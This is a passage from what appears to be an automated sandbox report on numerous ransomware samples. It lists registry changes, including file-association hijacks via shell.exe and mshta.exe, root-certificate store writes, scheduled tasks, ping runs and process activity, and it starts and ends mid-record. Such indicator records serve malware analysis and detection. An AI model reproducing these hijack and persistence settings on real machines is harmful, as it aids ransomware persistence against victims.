\REGISTRY\MACHINE\SOFTWARE\Classes\.locked otheo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\htafile\DefaultIcon\ = "%WinDir%\\SysWow64\\shell32.dll,44" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\edit\command\ = "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE\" /verb edit \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.locked\ = "BA887275" otheo.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\htafile\DefaultIcon Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sage.notice\shell\open\command\ = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\f2.hta\" \"%1\"" explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\edit msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\ShellEx\IconHandler msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sage.notice\DefaultIcon\ = "%WinDir%\\system32\\shell32.dll,47" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Software\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\FriendlyTypeName Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.sage explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\FriendlyTypeName\ = "encrypted file" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.sage\ = "sage.notice" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sage.notice\FriendlyTypeName explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\xmlfile\shell\edit msiexec.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe -
Runs ping.exe 1 TTPs 12 IoCs
pid Process 5388 PING.EXE 5828 PING.EXE 3268 PING.EXE 3572 PING.EXE 2168 PING.EXE 3620 PING.EXE 3040 PING.EXE 5792 PING.EXE 6420 PING.EXE 6064 PING.EXE 108 PING.EXE 4884 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2860 schtasks.exe 1656 schtasks.exe 5680 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 24 IoCs
pid Process 2040 Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 540 Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe 2900 Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe 2936 Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe 484 Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 1940 Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe 1828 Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe 1260 Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe 1648 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe 2116 Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe 1652 Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe 1988 Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe 3036 Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe 2220 Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe 1740 Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe 2548 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe 1136 Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe 2192 Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe 752 UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 2312 taskmgr.exe 2312 taskmgr.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 2312 taskmgr.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 2312 taskmgr.exe 752 UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 2028 Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe 2312 taskmgr.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe 1928 Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2756 7zFM.exe 2312 taskmgr.exe 1604 database.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2548 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe 3388 explorer.exe 3468 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe 3468 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe -
Suspicious behavior: RenamesItself 2 IoCs
